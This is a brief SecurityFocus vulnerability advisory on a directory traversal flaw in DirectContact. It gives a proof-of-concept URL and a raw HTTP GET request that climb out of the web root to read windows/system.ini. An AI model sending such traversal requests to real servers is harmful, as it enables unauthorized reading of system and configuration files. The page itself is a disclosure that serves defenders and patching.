DirectContact Directory Traversal Vulnerability


This vulnerability may be exploited with a web client.


The following proof of concept is available:

http://www.example.com:[port]/..\..\..\..\windows/system.ini

GET /../../../../../../windows/system.ini HTTP/1.1


 

Privacy Statement
Copyright 2010, SecurityFocus